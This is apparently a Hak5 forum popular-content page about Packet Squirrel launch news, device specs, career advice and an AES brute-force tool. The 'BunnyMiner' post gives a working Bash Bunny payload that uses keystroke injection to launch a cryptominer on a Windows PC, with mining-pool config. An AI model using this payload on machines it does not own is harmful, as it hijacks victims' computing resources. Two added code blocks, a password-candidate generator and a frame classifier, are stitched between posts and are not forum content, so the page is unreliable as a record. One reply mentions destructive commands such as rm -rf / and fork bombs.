Hak5 Forums


Popular Content

Showing content with the highest reputation since 09/23/2017 in all areas

  1. 9 points
    I think we may do a pre-order next week leading up to the launch on Friday, but it wouldn't be publicized really. Just something special for us cool peeps on the forums & IRC.
  2. 6 points
  3. 6 points
    Just working on securing a venue for a Hak5 event in San Francisco mid October to introduce you all to our new furry friends. 🐿️🐿️🐿️
  4. 5 points
    Here are the official specs:
    Atheros AR9331 SoC at 400 MHz MIPS
    16 MB Onboard Flash
    64 MB DDR2 RAM
    2x 10/100 Ethernet Port
    USB 2.0 Host Port
    4-way payload select switch
    RGB Indicator LED
    Scriptable Push-Button
    Power: USB 5V 120mA average draw
    Dimensions: 50 x 39 x 16 mm
    Weight: 24 grams
  5. 5 points
    I do enjoy reading posts like this while having a coffee :) never fail to entertain. Makes me wonder if it's one of you lot doing a windup :P
  6. 5 points
    Sample code! https://pastebin.com/aZyyS16w
  7. 5 points
    Currently working on a PoC - we'll see how well it works.
  8. 5 points
    Pre-orders would be filled day of release on the morning of the 20th. I'll update this thread early next week when it's ready -- I just need to coordinate with Sara and Jayson first to make sure this doesn't break anything =P
  9. 4 points
  10. 4 points
    The needle on the bullshit meter just flew off. Having worked and occasionally still work for school districts in the US, I can say that yes, the school can confiscate anything that a student uses on school property that damages the property. The network is school property.
  11. 4 points
    So sad to hear of the passing of Kerby...after so many years, I know how it feels. And Kerby loved to be on camera.... Darren, you have my greatest sympathy...
  12. 3 points
    Hey everyone, Version 1.4 of the Bash Bunny firmware is now available! With it comes an important fix which will prevent the device from boot-looping when an invalid update file is put onto the root of the Bash Bunny's storage partition. A bug in the Bash Bunny's QUACK command has also been fixed and all underlying packages have been updated. Find all the fixes and features in the changelog and bounce on by to BashBunny.com/downloads for your devious device download (\_/)
  13. 3 points
    You forgot

    NETMODE TRANSPARENT
    wget https://packetsquirrel.com
    BUTTON 1m && {
        echo "Discount unlocked!"
        LED FINISH
    } || {
        echo "Timeout dude!"
        LED FAIL
    }
  14. 3 points
    From the picture of: https://twitter.com/digininja It reads: The Packet Squirrel by Hak5 is a pocket sized Ethernet multi-tool for penetration testers and system administrators. Packet captures, MITM and remote access are made easy with its simple scripting language, online payload library and intuitive interface. Flip the switch to the desired payload, plug it in and get instant feedback from the multi-color LED.
  15. 3 points
    Soon-ish :-P Or one of my favorite things I did at DerbyCon 2016 booth...
  16. 3 points
    This was a very entertaining read. Thanks for the chuckle.
  17. 3 points
    By the way, does this look like a pentester, or some kids? https://twitter.com/jonbush1234 Where the profile pic for "Clarence" comes from. https://twitter.com/jonbush1234/status/914948133163061249 looks like maybe Mr "Clarence" needs help learning how to use his new rubber ducky. @Clarence will the real slim shady please stand up - https://www.twitch.tv/videos/173897157 After some digging, looks like he is 15yrs old, born in 2002. How long before a thread lock? I think he's suffered enough...
  18. 3 points
    This. Sorry, I don't believe for a moment that you aren't allowed to confiscate it. Schools are well within their rights to confiscate mobile phones, knives, and anything else they deem unsafe, inappropriate or a breach of their rules. The Rubber Ducky falls within this.
  19. 3 points
    They deliberately left out a part that said the students couldn't attack your network to make the job of a pen tester easier. Your first message sounded suspicious, this is now incompetent and suspicious.
  20. 3 points
    Confiscate the ducky and read the script.
  21. 3 points
    ::cracks knuckles:: Time to fire up Burp Suite.
  22. 3 points
    Yes. $0 if you're one of the first 100 at the party. $40-50 if you're not. There'll be other new devices too -- it's not just a Packet Squirrel launch party, it's an entire Hak5 Gear event ^_^
  23. 3 points
    Posting this to the community here first. Goes live in the morning 😉 https://hak5.org/rsvp Hope to see you in San Francisco - and if not IRL, soon after here ☺ 🐿️🐿️🐿️
  24. 2 points
    The Hak5 Gear Ethernet line consists of the Packet Squirrel and LAN Turtle (classic, SD, 3G). The LAN Turtle and Packet Squirrel are well suited for similar applications - remote access, man-in-the-middle attacks, packet sniffing, secure tunneling and network recon. Their biggest differences are their hardware (interfaces and appearance) and software (modules vs payloads). This affects how they are deployed, their stealth factors (for covert ops) and what actions are performed.

    Key Differences

    The LAN Turtle is best suited for long-term deployments at a client's facility to provide penetration testers with remote access to their network. Typically a social engineering operation is to plant a LAN Turtle on the target network with retrieval when the engagement has ended. Disguised as a USB Ethernet adapter, the LAN Turtle can provide this role uninterrupted. If remote access is guaranteed up front, the LAN Turtle (3G especially) can be shipped to the client site with simple instructions for deployment.

    The Packet Squirrel is an Ethernet multi-tool. It can provide a range of penetration testing functions, though it is equally suited for IT professionals and tech enthusiasts. The barrier to entry is lower since it relies on a simpler payload system of scripts. With the right scripts it can generally perform all of the functions of the LAN Turtle, however it is not as stealthy. Depending on how it is concealed it may not be as effective at long term deployments as the LAN Turtle.

    Applications

    Remote Access: Both are capable of providing encrypted remote access into a network. The LAN Turtle may be stealthier - disguised as a USB Ethernet adapter - and the 3G version bypasses perimeter defenses by bringing its own Internet backhaul.

    Man-in-the-Middle: The LAN Turtle can only perform MITM attacks against computers while the Packet Squirrel can be plugged inline between any two arbitrary Ethernet links (before computers, network printers, IP cameras and the like).

    Packet Sniffing: The Packet Squirrel is best suited at capturing packets to USB disks between any Ethernet segment using the built-in tcpdump payload. The LAN Turtle SD works similarly, logging to an internal MicroSD card - but only against a single computer.

    Secure Tunneling: Both devices can be used to secure network traffic, however the Packet Squirrel is better suited for this task using its built-in openvpn payload. Only minimal configuration is required and any network device may benefit from it as a hardware VPN router. The LAN Turtle can perform this task, albeit only for a single computer using a module.

    Network Recon: Both devices are equally capable of performing network reconnaissance, e.g. nmap scans. Typically these scans are completed within a few minutes and do not require a large amount of storage. Currently (10-22-17) an nmap module is available for the LAN Turtle while a similar payload for Packet Squirrel is not. That said, a payload is expected soon and when it arrives the user experience will be easier, considering the Packet Squirrel's hardware.

    Software

    The LAN Turtle uses a module system while the Packet Squirrel uses a payload system. Both modules and payloads are free open source software add-ons contributed by the community and available from a central git repository.

    Modules are downloaded to the device "over the air" and come with their own interface for configuration. Setting up a module usually entails entering a few key pieces of data into a graphical user interface. Multiple modules may be enabled to run simultaneously when the device is deployed.

    Payloads are downloaded to the device manually, or via an updater app, in the form of one or more text files. Configuring a payload consists of editing the text file and changing values, typically at the beginning of the file. Multiple payloads may be carried and assigned to the various switch positions, however only one payload may run at once.

    Hardware

    Interfaces: The Packet Squirrel features two standard RJ45 Ethernet jacks and can therefore be installed inline between most any network segment. The LAN Turtle features one standard RJ45 Ethernet jack and one standard USB Type-A plug for power and USB Ethernet. Because of this it may be powered from any ordinary USB power source and connected to a network, however it can only be planted inline between a computer and network.

    Power: Both may be battery powered, but in the case of the LAN Turtle powering from a USB battery means that it is no longer suited for inline (MITM, Packet Sniffing) applications. Both have very low (~100-200 mA) power draw, so running off high capacity USB battery banks is a possibility.

    Feedback: The Packet Squirrel features an RGB LED for feedback. Its LED command is compatible with the Bash Bunny LED syntax, so standard payload states are easily distinguished. The LAN Turtle typically provides feedback to the penetration tester via software, e.g. the establishment of an SSH reverse shell. While it features two static programmable LED indicators, one yellow and one green, modules seldom take advantage of this hardware.

    Setup: The LAN Turtle has no special hardware for setup -- all modules are enabled or disabled in software. The Packet Squirrel provides a payload selection switch allowing the operator to choose the appropriate payload at runtime.

    Interaction: The Packet Squirrel provides a button for interaction with payloads. The LAN Turtle's button is not exposed to the user (inside the case) and is only used for reset and recovery.
  25. 2 points
    It's a great companion to the USB attack tools, with the right payload. You'll see. Basically drop the Squirrel as a listener for an accompanying payload on the Duck/Bunny. Working on something special for that. Also, noted hardware request.
  26. 2 points
    I got you fam. Preshow: The main event: I was there. It was dope.
  27. 2 points
  28. 2 points
    Heh, made you look! 🤣😂🤣😂🤣😂
  29. 2 points
    https://github.com/michael-weinstein/veraT It gets the tumor and normal tissue DNA exomes and the tumor RNA. It extracts the patient's HLA type (immune system markers) from the normal tissue DNA, finds the tumor-specific mutated proteins by comparing the tumor and normal DNA, and then looks at the RNA to figure out if the mutated proteins are likely being made. It then takes the mutated protein sequences and the HLA types and predicts which of these mutant proteins are going to be best presented to the immune system, which essentially gives the most immune-vulnerable changes in the cancer. Once that happens, we can try to target those things for an immune response.
  30. 2 points
  31. 2 points
    It's a script to test for the vuln, not the attack script: "Remember that this is not an attack script!" & "we are already releasing this code because the script got leaked"
  32. 2 points
    Interesting. If I can confirm this issue, we'll get it fixed and pushed out Friday.
  33. 2 points
    Kid, don't run any ducky scripts anybody gives you here. At this point, they're all going to be rm -rf / and fork bombs. Also, there's very little interesting stuff you can run on a chromebook that's not rooted and running... uh... not chromeOS.
  34. 2 points
    ... Stop. Just stop. You are paid to do a job, they don't have to pay you less due to leaving out part of an AUP. At this point I am convinced you are lying, and are a student trying to get around a firewall in your school by having us write a script for a USB Rubber Ducky for you.
  35. 2 points
    Forgive the scepticism but this is a variant of the "how do I hack my wife's Facebook account?". We have no idea who you are, whether you have permission to do what you are doing or anything else. My generic suggestions would be to check the logs, check the config for anything that appears to be more open than it's supposed to be and try asking the student, he may be happy to boast about how he did it in return for a less harsh penalty.
  36. 2 points
  37. 2 points
    $40-50 for the packet squirrel? What about the other two? How much to get all three?
  38. 2 points
    Maybe relevant? https://depthsecurity.com/blog/unauthorized-flir-cloud-access
  39. 2 points
    After 3 months of work I've released version 0.1 of Abrute. Abrute is a multi-threaded AES brute force file decryption tool. It has much of the same character sequencer support that the crunch tool does. I've spent a good portion of my development time discovering and implementing sequence algorithms to shave off as many wasted CPU cycles as I can, and I feel pretty good about it. The beauty of it is that it works.

    Now the computers I own only have 4 cores, so I'm limited in the amount of processing power to get workloads done. I can say that with a finite amount of cores the workload goes up exponentially as the password length goes up. Also true for the longer a character set is to work with. I so want the new AMD Threadripper with all its cores.

    My journey started with finding some of my old archived encrypted files and discovering I am unable to remember the password correctly. This led me to look for answers on Security/StackExchange. I went from creating a detailed question, as I was unable to find the answers I was looking for, and got a few small tips pointing me towards the tool known as crunch. I have answered my own question on the forum with many helpful ways I've tried to implement a solution to opening my AES encrypted files. That thread is here: https://security.stackexchange.com/questions/161592/how-to-brute-force-a-somewhat-remembered-aescrypt-password

    On that thread I first developed a likely word list with shuffling sequences, ordering, and generating plenty of output to test against. That didn't open the file for me but that code has already helped one other person open their encrypted file. Next I learned how to do the equivalent of multi-threading using only Bash and xargs, which will let you spin up parallel processes to run across all your cores. And that works well with crunch. But this was a bit crude as I had to let it run many weeks and could only check the progress by peeking into data being passed through Linux pipes. Not to mention a power outage had me lose a good chunk of progress. So yeah, I wanted to have something better.

    So I wrote Abrute. I ended up rewriting most of the crunch tool into my own sequencer with my algorithm improvements to save CPU cycles. And the attempts for decrypting are all calls to the aescrypt command for now. But the threading work is handled brilliantly (someone else's library) and at the moment I have standard out including progress. Over time I plan to write my own code for decrypting AES files and drop the need for the aescrypt executable. I also want to add GPU support for processing with ArrayFire but I first need to look into how feasible this is.

    Abrute works well on Mac and Linux and is untested on Windows (it shouldn't take too long to try it out on Windows). The commands are fairly straightforward and detailed in the help you get with -h. You can set the range of characters, character set, limit adjacent same characters, and start point. This uses your CPU cores at 100% so you'll likely need to do this work on a secondary system. I'm playing with the idea of divvying out the work to the cloud. You can rent an Amazon multi-core system for around 64 cores @ $3 to $5 an hour. So I can only imagine the performance gains from splitting the work across so many systems and system cores.

    Benchmarking is next for my project. I plan to have this program be one of those system benchmarks that everyone compares their computer by. I have some numbers from the original bash/crunch/xargs: at two character passwords I got about 35 passwords tried per second, at 3 character passwords I get about 12 passwords tried per second. At 8 characters with 4 cores a month isn't out of the question. So long passwords would be a long term commitment to try to crack unless you own Amazon or the like. I may never get my files open again. I have a tendency towards longer passwords.

    But this whole journey has been an amazing learning experience for me allowing me to sharpen many skills and develop many new ones. Anyway I hope you all find this tool useful. I'll get back to you with the newer benchmark numbers when I have them. Feel free to contribute to the project in any way. _I have enough details for you to get it running on a Docker image so cloud is already possible._ I'm just excited about it. Enjoy! ~6ftdan
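As an added illustration for the post above (this is not Abrute's code and not from the poster), the Python below sketches the sequencer features the post lists: an ordered character set, a length range, a limit on adjacent identical characters, and a start point for resuming an interrupted run, together with the keyspace arithmetic behind "the workload goes up exponentially". The `demo_check` function and `DEMO_SECRET` are constructed stand-ins for the real oracle, which in the post is a call to the aescrypt binary with each candidate password.

```python
import itertools

def keyspace(charset_size, min_len, max_len):
    """Candidates over all lengths min_len..max_len inclusive (no filtering)."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def eta_seconds(charset_size, min_len, max_len, rate_per_second):
    """Worst-case wall time to exhaust the keyspace at a measured try rate."""
    return keyspace(charset_size, min_len, max_len) / rate_per_second

def longest_run(seq):
    """Length of the longest run of identical adjacent symbols in seq."""
    best = run = 1 if seq else 0
    for a, b in zip(seq, seq[1:]):
        run = run + 1 if a == b else 1
        best = max(best, run)
    return best

def candidates(charset, min_len, max_len, max_adjacent=None, start=None):
    """Yield candidates in crunch-like order over the given charset.

    charset      - ordered symbols; the order defines the enumeration order
    max_adjacent - drop candidates containing a run of identical symbols
                   longer than this (the 'limit adjacent same characters' knob)
    start        - resume point: skip every shorter length and everything
                   before `start` in its own length bucket, so a run cut
                   short (e.g. by a power outage) continues without repeating
                   finished work
    """
    base = len(charset)
    if len(set(charset)) != base:
        raise ValueError("charset must not contain duplicate symbols")
    start_idx = None
    if start is not None:
        # charset.index raises ValueError for a symbol outside the charset
        start_idx = tuple(charset.index(c) for c in start)
    for n in range(min_len, max_len + 1):
        if start_idx is not None and n < len(start_idx):
            continue  # this whole length bucket was finished before the interruption
        it = itertools.product(range(base), repeat=n)
        if start_idx is not None and n == len(start_idx):
            rank = 0
            for i in start_idx:          # mixed-radix position of `start`
                rank = rank * base + i
            it = itertools.islice(it, rank, None)
        for idx in it:
            if max_adjacent is not None and longest_run(idx) > max_adjacent:
                continue
            yield "".join(charset[i] for i in idx)

def search(check, charset, min_len, max_len, **options):
    """Run check(candidate) -> bool over the keyspace; return (hit, attempts)."""
    attempts = 0
    for cand in candidates(charset, min_len, max_len, **options):
        attempts += 1
        if check(cand):
            return cand, attempts
    return None, attempts

# Constructed stand-in for the real oracle (a decryption attempt per candidate).
DEMO_SECRET = "cab"

def demo_check(candidate):
    return candidate == DEMO_SECRET

if __name__ == "__main__":
    hit, tries = search(demo_check, "abc", 1, 3, max_adjacent=1)
    print(f"found {hit!r} after {tries} attempts")
    hit, tries = search(demo_check, "abc", 1, 3, max_adjacent=1, start="bab")
    print(f"resumed from 'bab': found {hit!r} after {tries} attempts")
    hours = eta_seconds(26, 1, 8, 12) / 3600
    print(f"lowercase, 1-8 chars, 12 tries/s: {hours:,.0f} hours worst case")
```

The resume logic skips by rank rather than by comparing strings, so it respects the charset's own ordering even when that differs from Unicode order; `eta_seconds` is the arithmetic to run before committing a machine to a long job, using whatever tries-per-second figure your own benchmark gives.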
  40. 2 points
    BunnyMiner
    By Ar1k88

    I'm going to "quietly" sneak this onto the thread...

    **** PLEASE DO NOT USE THIS ON OTHER PEOPLE'S PCs! MYSELF & MINERGATE DO NOT ENCOURAGE SUCH USE! ****

    Anyways, this is just a Simple CPU Miner from my collection of odd scripts. And figured since this place doesn't cover this topic, I would try to do it myself. This is a SMALL NON-Silent CPU Miner; yes, it can be made to be silent. The whole object of this post would be for demonstration purposes. I'll just post it and see what happens. :)

    payload.txt

    #!/bin/bash
    #
    # Title: USB CPU Miner
    # Author: Ar1k88
    # Version: 1.1g
    # Target: Windows 7-10
    # Category: Exploiting Resources
    # Sub-Category: Cryptocurrency
    #
    # I'm not promoting here. BUT since I do work for MinerGate (a HUGE Cryptocurrency Mining Pool) I am releasing
    # a Simple Non-Silent CPU Miner. Just to show that it is possible to mine Digital Currency with a USB.
    #
    # Please change the credentials in "config.txt" to this format:
    # <algorithm>
    # <pool stratum>
    # <username/wallet>
    # <cores/threads>
    #
    # Keep in mind this is just a Simple CPU Miner. I will leave the code here. You will need to go to
    # https://github.com/tpruvot/cpuminer-multi/releases/download/v1.3-multi/cpuminer-multi-rel1.3.zip
    # Extract the EXEs and use the x86 (32Bit) version because it supports both 32Bit and 64Bit CPU
    # architectures. Add "cpuminer-x86.exe" and "msvcr120.dll" to the payload folder, and rename it to "2.exe".
    # Enjoy! -Ar1k88

    # NOTE: Setting to Read-Only Storage to prevent antivirus from removing binary files (EXEs).
    ATTACKMODE HID RO_STORAGE

    # Grace period for the PC to recognize the BashBunny (placed after ATTACKMODE so the
    # wait covers the host enumerating the newly presented HID and storage devices).
    Q DELAY 300

    # Setting up and Attacking! CHARRRRGGGEEE!!!
    LED ATTACK

    # Locate the BashBunny volume by label and run 1.cmd from this switch's payload folder.
    RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\1.cmd')"

    LED FINISH

    1.cmd

    @echo Off
    cls
    REM This is to set easy to edit files for new users. Anyone who used a Console Miner would know what this is.
    REM -Ar1k88
    SetLocal EnableDelayedExpansion
    Set n=
    REM %~dp0 already ends with a backslash, so no extra separator is needed.
    Set ConfigFile=%~dp0config.txt
    REM Read config.txt line by line into var1..var4 (algorithm, stratum, wallet, threads).
    For /F "tokens=*" %%I IN (%ConfigFile%) DO (
        Set /a n+=1
        Set var!n!=%%I
    )
    echo %var3%
    call "%~dp02.exe" -a %var1% -o %var2% -u %var3% -p x -t %var4%
    pause
    EndLocal
    @exit /B

    Config.txt is set up as follows:
    <algorithm>
    <stratum>
    <email/wallet>
    <threads/cores>

    config.txt

    cryptonight
    stratum+tcp://aeon.pool.minergate.com:45550
    [email protected]
    2

    Enjoy!

    P.S. - If you want to sign up to show this off to your friends or for work, you can easily create an account at MinerGate. http://bit.ly/MinerGateSignUp https://twitter.com/ar1k88 -Ar1k88
  41. 2 points
    If you don't have a background in Information Technology, i.e. no formal training, at a minimum get some basic classes in. If you truly know your networking and sysadmin stuff, then sure, take a gander at SANS and Offsec, but don't just jump in if you don't have some sort of foundational grasp of things. CompTIA Network+, Linux+ (even an A+ class, but not required) and a basic Windows MCP class should be enough to grasp most things needed for the security side, but most people in penetration testing started on the LAN side or as system administrators with networking backgrounds before going to the other side. Not a requirement, but it will make your life much easier before trying a pentesting course. Knowing TCP/IP basics, the OSI model, some form of file sharing and network administration (i.e. Active Directory, SMB/Samba) and Windows and Linux OS command line use will greatly help you in the long run.

    Offsec's PWK is more or less entry-level pentesting, but I wouldn't consider it an easy course by any means. It's very foundational and very instructional, but it's 100% hands on: you need to physically do the task to pass. Part video, part text instructional, you'll spend most of your time in a VPN'ed virtual lab, performing real attacks against actual installed machines set up with real-world vulnerabilities or misconfigurations, all networked like a real corporate network, allowing you to attack one machine and pivot through the network to others.

    SANS is also a really good class, but I wouldn't consider either theirs or Offsec's to be "hey, took the class, now I'm a pro". It will definitely build the mindset needed to be a pentester, and both will allow you to physically do the things you would in a pentest. SANS offers a number of courses, some of which may only be instructional with multiple choice questions; OSCP and other Offsec courses are all hands-on, you have to perform actual hacking tasks to pass, and there are no multiple choice questions. You also have to write an actual pentest report, which is part of your passing grade as well, so don't just pass that part up, because it's what you would need to know and do well in the real world if doing the same thing for your job.

    If you have no background in any of the above I mentioned, start out gradually and build on the basics. Cybrary, YouTube, Google and SecurityTube can help. Look into the following materials; you don't have to take the certifications, but you can still read the books on the topics to get more well rounded:

    CompTIA Network+
    CompTIA Linux+
    CompTIA Security+
    Microsoft MCP books for MCSA/MCSE

    Set up a home lab with some virtual machines: set up a domain controller with Windows Server and an Active Directory domain, network some client computers to it, and try out some CTFs from places like Vulnhub or Hack The Box, as well as Pentester Academy. Then I'd work on PWK/OSCP and then maybe SANS.
  42. 2 points
    Yep, I've got a links page for each device, linked in the main "README.md". I'll add the Github Wiki for the Pineapple to the Pineapple's links page and add the Hak5 Github to the main README though, thanks.
  43. 2 points
    You could buy a cheap router that will take openwrt. Plug the wan side into your existing router and run WiFi and wired off openwrt instead. You'd then have a Linux box you could ssh to and use tools like tcpdump to watch traffic as you would be in the middle of everything.
  44. 2 points
    Question one: I can put whatever IP I want in a device, it doesn't have to use DHCP. An IP of with a netmask of and default gateway of may work fine on your network depending on the set up. Question two: you plugged into a switch, not a hub. You being in promiscuous mode means you see everything you are sent but the switch will only send you traffic meant for you which means your IP and broadcast traffic. What you are expecting is what you'd get off a hub or a span port.
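To make the switch-versus-hub point above concrete, here is an added Python example (not from the post, and not Hak5 code) that classifies the Ethernet frames a NIC in promiscuous mode actually receives and infers from the mix whether it sits on a plain switch port or on a hub, SPAN/mirror port or inline tap. Every frame and MAC address below is constructed for the illustration; `OUR_MAC` is an assumed address for the sniffing host.

```python
import struct

# Constructed sample addresses (not captured from any real network).
OUR_MAC = bytes.fromhex("021a2b3c4d5e")     # the sniffer's own NIC (assumed)
OTHER_MAC = bytes.fromhex("02aabbccddee")   # another host on the segment
GATEWAY = bytes.fromhex("020000000001")
BROADCAST = b"\xff" * 6
IPV4_MCAST = bytes.fromhex("01005e000001")  # group MAC for 224.0.0.1
ETH_IPV4 = 0x0800
ETH_ARP = 0x0806

def frame(dst, src, ethertype, payload=b"\x00" * 4):
    """Build a minimal Ethernet II frame: dst(6) src(6) type(2) payload."""
    return dst + src + struct.pack("!H", ethertype) + payload

def classify(raw, our_mac):
    """Say why a frame reached a promiscuous NIC.

    own-unicast / broadcast / multicast are what a switch delivers to any
    port; foreign-unicast (someone else's conversation) only shows up when
    the medium or the switch is copying traffic to us.
    """
    if len(raw) < 14:
        raise ValueError("truncated Ethernet header")
    dst = raw[:6]
    if dst == our_mac:
        return "own-unicast"
    if dst == BROADCAST:            # check before the group bit: ff:ff:.. has it set too
        return "broadcast"
    if dst[0] & 0x01:               # I/G bit set in the first octet: multicast
        return "multicast"
    return "foreign-unicast"

def segment_type(kinds):
    """Infer the port type from the classified frames.

    Any foreign unicast proves a hub, SPAN/mirror port or inline tap.  No
    foreign unicast is only weak evidence (a quiet segment looks identical),
    so that case is reported as probable rather than certain.
    """
    counts = {k: kinds.count(k) for k in set(kinds)}
    if counts.get("foreign-unicast", 0) > 0:
        return "hub, SPAN/mirror port or inline tap", counts
    return "switched port (probable)", counts

def analyse(frames, our_mac=OUR_MAC):
    return segment_type([classify(f, our_mac) for f in frames])

# What a plain switch port hands a promiscuous NIC: traffic for us plus floods.
SWITCH_PORT_CAPTURE = [
    frame(OUR_MAC, GATEWAY, ETH_IPV4),
    frame(BROADCAST, OTHER_MAC, ETH_ARP),
    frame(IPV4_MCAST, GATEWAY, ETH_IPV4),
]
# The same, plus two frames of a conversation between two other hosts.
SPAN_PORT_CAPTURE = SWITCH_PORT_CAPTURE + [
    frame(OTHER_MAC, GATEWAY, ETH_IPV4),
    frame(GATEWAY, OTHER_MAC, ETH_IPV4),
]

if __name__ == "__main__":
    for name, cap in (("switch", SWITCH_PORT_CAPTURE), ("span", SPAN_PORT_CAPTURE)):
        verdict, counts = analyse(cap)
        print(f"{name}: {verdict} {counts}")
```

Against a real capture, replace the constructed lists with the raw bytes of each packet (for a pcap read with scapy's `rdpcap`, that is `bytes(pkt)` per packet) and pass your interface's MAC as `our_mac`; a result of only own-unicast, broadcast and multicast is exactly the behaviour the post describes for a switch port.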
  45. 2 points
    Why wipe the machine? If you created a new user, take ownership of the old account/files, and move their files over to the new profile, then nuke the old user profile. I actually do this for people when I fix their machines and they've broken their profile somehow. No need to reinstall everything unless you believe there is malware on it.
  46. 2 points
    @Darren Kitchen. Do we get any hints? We have been waiting for weeks to catch even the slightest details!!!
  47. 2 points
    The last I have heard is that more details will be available in early October. When / how is up to Darren :) I'd love to say more, but my hands are tied.
  48. 2 points
  49. 2 points
    Throw us a bone, @Sebkinne! :)
  50. 2 points
    Ahem... So does being mid Sept. constitute appeasing our endless anticipation with at least another hint? Can't blame a fellow for trying right...